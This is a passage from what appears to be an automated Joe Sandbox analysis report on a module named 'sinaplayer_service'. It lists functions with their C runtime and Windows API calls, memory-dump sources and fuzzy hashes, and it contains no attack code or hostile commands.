                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __daylight__dstbias__timezone_get_daylight_invoke_watson_malloc_crtfreestrcmpstrlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1461246701-0
                                                                                                                                                                                                    • Opcode ID: 59a6a54ef18f8ee8343cde42680b6ccbf60a02e9856feda8b8d6ab41a5c09d5b
                                                                                                                                                                                                    • Instruction ID: 26e674fcce6bc49d01fb4e8bad10f2eacf17f2b8c81339bb59d4c9fb38fc632a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59a6a54ef18f8ee8343cde42680b6ccbf60a02e9856feda8b8d6ab41a5c09d5b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8561D0A2644255AEFB248BAAAC81F3B33FCE74A714F55401AFA41DB0C0F7B59C819770
                                                                                                                                                                                                    Function 6D092781 Relevance: 13.7, APIs: 9, Instructions: 219COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,?,00000000,?), ref: 6D09281E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 626452242-0
                                                                                                                                                                                                    • Opcode ID: 9f66b22fdc51f8d139e4cbf18b1624dc38b21e5ab34788f352c129520dde0bb9
                                                                                                                                                                                                    • Instruction ID: 212177e54ef71a6405747f0ad09695adfceb28d3bd998056e91b6f483768bf42
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f66b22fdc51f8d139e4cbf18b1624dc38b21e5ab34788f352c129520dde0bb9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6671D330D052179BFB218FB9C840BBFBBB5FF46710B649229E4206B1A5DBB0C941D7A1
                                                                                                                                                                                                    Function 6D10BEF8 Relevance: 13.7, APIs: 9, Instructions: 201stringCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(6D163B90,00000000,6D163B90,00000001,00000000,00000001,?,00000000,00000000,6D163B90,6D0FC0DE), ref: 6D10BF33
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D163B90,00000000,6D163B90,00000001,00000000,00000001,?,00000000,00000000,6D163B90,6D0FC0DE), ref: 6D10BF3D
                                                                                                                                                                                                    • strncpy_s.MSVCR120(00000001,00000000,00000000,6D163B90,00000000,00000001,6D163B90,00000000,6D163B90), ref: 6D10BF68
                                                                                                                                                                                                    • _ismbblead_l.MSVCR120(6D163B90,6D163B90,00000000,00000001,6D163B90,00000000,6D163B90), ref: 6D10BFE3
                                                                                                                                                                                                    • _ismbblead_l.MSVCR120(6D163B90,6D163B90,00000000,00000001,6D163B90,00000000,6D163B90), ref: 6D10C030
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000001,6D163B90,00000000,6D163B90), ref: 6D10C05D
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,00000001,6D163B90,00000000,6D163B90), ref: 6D10C067
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo_ismbblead_l$_invalid_parameterstrncpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 757364618-0
                                                                                                                                                                                                    • Opcode ID: bb82d18724ea39fc0e1c34276c982e71bb1e222f83e3dba92fb601abe63c7432
                                                                                                                                                                                                    • Instruction ID: b4fe1a2f52ef4e513fb13b1da18c2e841a8475b45a4aeb1cd57c8481bd09c668
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb82d18724ea39fc0e1c34276c982e71bb1e222f83e3dba92fb601abe63c7432
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5551F5356082479BCB02EE68C5506AE77B6AF5A314F11815AE9609B28DDFF1C841CFB2
                                                                                                                                                                                                    Function 6D0A2837 Relevance: 13.7, APIs: 9, Instructions: 195COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • free.MSVCR120(?,00006A69), ref: 6D0A1A4A
                                                                                                                                                                                                    • free.MSVCR120(?,?,00006A69), ref: 6D0A1A55
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,00000050), ref: 6D0A2860
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000004), ref: 6D0A2881
                                                                                                                                                                                                      • Part of subcall function 6D092226: malloc.MSVCR120(6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D092237
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000004), ref: 6D0A28A4
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6D0E01B6
                                                                                                                                                                                                    • ___free_lconv_num.LIBCMT ref: 6D0E01C7
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6D0E01D4
                                                                                                                                                                                                    • free.MSVCR120(?,?), ref: 6D0E01DD
                                                                                                                                                                                                      • Part of subcall function 6D0A1BFC: __crtGetLocaleInfoEx.MSVCR120(?,00001004,00000000,00000000,?,?,00000000), ref: 6D0A1C46
                                                                                                                                                                                                      • Part of subcall function 6D0A1BFC: _calloc_crt.MSVCR120(00000000,00000002,?,?,?,00000000), ref: 6D0A1C5B
                                                                                                                                                                                                      • Part of subcall function 6D0A1BFC: __crtGetLocaleInfoEx.MSVCR120(?,00001004,00000000,00000000,?,?,?,00000000), ref: 6D0A1C77
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$InfoLocale__crt_calloc_crt_malloc_crt$___free_lconv_nummalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2413701623-0
                                                                                                                                                                                                    • Opcode ID: d985c9837a1c83512fc44776885fc7194795224e4cd56b2632681eead9efb452
                                                                                                                                                                                                    • Instruction ID: 0d8fc672fb0c1dea0076e61922b4eac0c2ddac6c5bfaf309691d3517f314a462
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d985c9837a1c83512fc44776885fc7194795224e4cd56b2632681eead9efb452
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D861E371908206AFFB11CFB8C841BAA7BF5FF05750F19406AE958EB282E770D941CB90
                                                                                                                                                                                                    Function 6D10C506 Relevance: 13.7, APIs: 9, Instructions: 190stringCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo_ismbblead_l$strncpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3147246080-0
                                                                                                                                                                                                    • Opcode ID: 1c0fbf60ac6f5b5221559703d81f14d7736ad9bee9bda2808d980dc4d5500ba7
                                                                                                                                                                                                    • Instruction ID: d50584db73206329975b345b925d949f446ee06765aaa6750452a851f5320b7d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c0fbf60ac6f5b5221559703d81f14d7736ad9bee9bda2808d980dc4d5500ba7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F510435A082479FCB12EF68C4505AEBBB6EF66314F219159E8509B358DFB1D901CFB0
                                                                                                                                                                                                    Function 6D09ED6E Relevance: 13.7, APIs: 9, Instructions: 162COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _fileno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 467780811-0
                                                                                                                                                                                                    • Opcode ID: c1b2763565f82e3f34480913fc0f0f0f4b36d390cde1ac6f774121788fb29865
                                                                                                                                                                                                    • Instruction ID: 5808a955f55ed761c079926d0343fe1e8dfb8ae8fb3498283a534da260f18ee1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c1b2763565f82e3f34480913fc0f0f0f4b36d390cde1ac6f774121788fb29865
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7351037581A707AFF7018B68C844B39B7B0FF0A328B54926AD9358F2D1E734E850DB91
                                                                                                                                                                                                    Function 6D0AFEA1 Relevance: 13.6, APIs: 9, Instructions: 130COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _fileno.MSVCR120(?,?,00000000,?,?,6D0AFEEC,?,?), ref: 6D0AFEAB
                                                                                                                                                                                                    • _errno.MSVCR120(?,00000000,?,?,6D0AFEEC,?,?), ref: 6D0AFEC8
                                                                                                                                                                                                    • __p__iob.MSVCR120(6D15F520,?,00000000,?,?,6D0AFEEC,?,?), ref: 6D0B1427
                                                                                                                                                                                                    • __p__iob.MSVCR120(6D15F520,?,00000000,?,?,6D0AFEEC,?,?), ref: 6D0B1437
                                                                                                                                                                                                    • _errno.MSVCR120(?,00000000,?,?,6D0AFEEC,?,?), ref: 6D0D5272
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __p__iob_errno$_fileno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2686820381-0
                                                                                                                                                                                                    • Opcode ID: e19d44aeeee2b5d0a01df9d45aabb01e3ca80d12483f062c698ec137561861a3
                                                                                                                                                                                                    • Instruction ID: 87f4b171e772cc132e34592a940e6a8521207466919eeea5f1f36d0998f6e57e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e19d44aeeee2b5d0a01df9d45aabb01e3ca80d12483f062c698ec137561861a3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D541EF756187069BF3248FA8C880B7E77E4EF46320F00C62EE9A68B6D4D774D8408B52
                                                                                                                                                                                                    Function 6D0F21B9 Relevance: 13.6, APIs: 9, Instructions: 102COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __crtGetTickCount64.MSVCR120(E18D5491), ref: 6D0F21EA
                                                                                                                                                                                                    • WaitForSingleObjectEx.KERNEL32(?,00000064,00000000), ref: 6D0F2216
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6D0F2221
                                                                                                                                                                                                    • __crtGetTickCount64.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,6D15B718,000000FF), ref: 6D0F224E
                                                                                                                                                                                                    • Concurrency::details::ResourceManager::DiscardExistingSchedulerStatistics.LIBCMT ref: 6D0F226C
                                                                                                                                                                                                    • Concurrency::details::ResourceManager::SendResourceNotifications.LIBCMT ref: 6D0F227D
                                                                                                                                                                                                    • __crtGetTickCount64.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,6D15B718,000000FF), ref: 6D0F2282
                                                                                                                                                                                                    • Concurrency::details::ResourceManager::SendResourceNotifications.LIBCMT ref: 6D0F229E
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6D0F22C7
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Concurrency::details::Count64Manager::Tick__crt$CriticalNotificationsSectionSend$DiscardEnterExistingLeaveObjectSchedulerSingleStatisticsWait
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1553915505-0
                                                                                                                                                                                                    • Opcode ID: e161af4ed5fad14455f2dc253b73f448208b0e66512b760660d72cf15302626e
                                                                                                                                                                                                    • Instruction ID: 5dfc078521b48b2d0d41671e68d15b61474b34b4cb93b4cc9100cb0aba92f167
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e161af4ed5fad14455f2dc253b73f448208b0e66512b760660d72cf15302626e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60314871908352ABEB608F79C84076EB7E1FBC5724FA0072AF954D76D1C77499428BC2
                                                                                                                                                                                                    Function 6D0B4152 Relevance: 13.6, APIs: 9, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock.MSVCR120(00000008,6D0B4238,0000001C,6D0FBBC7,00000000,00000001,00000000,?,6D0FBBA8,000000FF,?,6D0D3CEC,00000010,00000000,6D08F77F,00000001), ref: 6D0B4174
                                                                                                                                                                                                    • DecodePointer.KERNEL32(6D0B4238,0000001C,6D0FBBC7,00000000,00000001,00000000,?,6D0FBBA8,000000FF,?,6D0D3CEC,00000010,00000000,6D08F77F,00000001,00000000), ref: 6D0B41B1
                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,6D0FBBA8,000000FF,?,6D0D3CEC,00000010,00000000,6D08F77F,00000001,00000000), ref: 6D0B41C6
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,6D0FBBA8,000000FF,?,6D0D3CEC,00000010,00000000,6D08F77F,00000001,00000000), ref: 6D0B41DF
                                                                                                                                                                                                    • DecodePointer.KERNEL32(-00000004,?,6D0FBBA8,000000FF,?,6D0D3CEC,00000010,00000000,6D08F77F,00000001,00000000), ref: 6D0B41EF
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,6D0FBBA8,000000FF,?,6D0D3CEC,00000010,00000000,6D08F77F,00000001,00000000), ref: 6D0B41F9
                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,6D0FBBA8,000000FF,?,6D0D3CEC,00000010,00000000,6D08F77F,00000001,00000000), ref: 6D0B420F
                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,6D0FBBA8,000000FF,?,6D0D3CEC,00000010,00000000,6D08F77F,00000001,00000000), ref: 6D0B421A
                                                                                                                                                                                                      • Part of subcall function 6D0B4113: GetModuleHandleW.KERNEL32(00000000,6D0B416A,6D0B4238,0000001C,6D0FBBC7,00000000,00000001,00000000,?,6D0FBBA8,000000FF,?,6D0D3CEC,00000010,00000000,6D08F77F), ref: 6D0B4115
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Pointer$Decode$Encode$HandleModule_lock
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 184903718-0
                                                                                                                                                                                                    • Opcode ID: b0ba3b07a331890cf5c3f42280f4493b300cda329e65064a78965cb879fdb652
                                                                                                                                                                                                    • Instruction ID: fb8e1c04b7d8355c2b78837f7da6716aa64c19f2bb3d2c4c4652cfc8f70719ff
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b0ba3b07a331890cf5c3f42280f4493b300cda329e65064a78965cb879fdb652
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00319C70C0835AAFFF019FA5D8413ACBBB5BF5D358F91402ADA10A7251DBB68944DF50
                                                                                                                                                                                                    Function 6D0940EC Relevance: 13.6, APIs: 9, Instructions: 86stringCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __unDName.MSVCR120(00000000,?,00000000,?,?,00002800,6D094110,0000000C), ref: 6D0A3979
                                                                                                                                                                                                    • strlen.MSVCR120(00000000), ref: 6D0A398C
                                                                                                                                                                                                    • _lock.MSVCR120(0000000E), ref: 6D0A39A9
                                                                                                                                                                                                    • malloc.MSVCR120(00000008), ref: 6D0A39BB
                                                                                                                                                                                                    • malloc.MSVCR120(-00000004), ref: 6D0A39CC
                                                                                                                                                                                                    • strcpy_s.MSVCR120(00000000,-00000004,00000000), ref: 6D0A39E0
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D0A3A05
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: malloc$Name__un_lockfreestrcpy_sstrlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4210340334-0
                                                                                                                                                                                                    • Opcode ID: 81b93addd82c0aec30042818df8c847b32a875eaa17d4c7e6c336709412ef422
                                                                                                                                                                                                    • Instruction ID: 4067d4c9d70c50e5c02a0527244a4e5450d03eaf6ca0c38a17c74277730deb02
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81b93addd82c0aec30042818df8c847b32a875eaa17d4c7e6c336709412ef422
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7821F1B1908713ABFB019BF48841B6EB7E4BF0A304F41C529E9189B282EB31D441C694
                                                                                                                                                                                                    Function 6D0F0007 Relevance: 13.6, APIs: 9, Instructions: 82threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D0FA549: CreateThread.KERNEL32(00000000,00010000,00000000,00000000,?,6D0F22EF), ref: 6D0FA55C
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,6D0D29FC), ref: 6D0F002F
                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,0000000F,?,?,?,?,?,6D0D29FC), ref: 6D0F003E
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(?,?,?,?,?,?,6D0D29FC), ref: 6D0F005D
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,?,?,?,?,?,?,6D0D29FC), ref: 6D0F006B
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6D0F00BA
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6D0F00C8
                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 6D0F00D1
                                                                                                                                                                                                    • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000), ref: 6D0F00DE
                                                                                                                                                                                                    • free.MSVCR120 ref: 6D0F00ED
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
